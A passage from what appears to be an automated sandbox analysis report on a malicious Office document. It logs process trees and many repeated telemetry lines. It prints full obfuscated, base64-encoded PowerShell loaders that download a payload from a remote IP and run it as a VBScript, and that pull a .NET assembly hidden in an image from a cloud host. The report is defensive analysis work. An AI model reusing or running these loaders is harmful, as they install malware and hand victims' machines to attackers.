3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovalsJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899A022D push eax; iretd 7_2_000007FE899A0241
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899A00BD pushad ; iretd 7_2_000007FE899A00C1

        Persistence and Installation Behavior

        barindex
        Installs new ROOT certificates
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
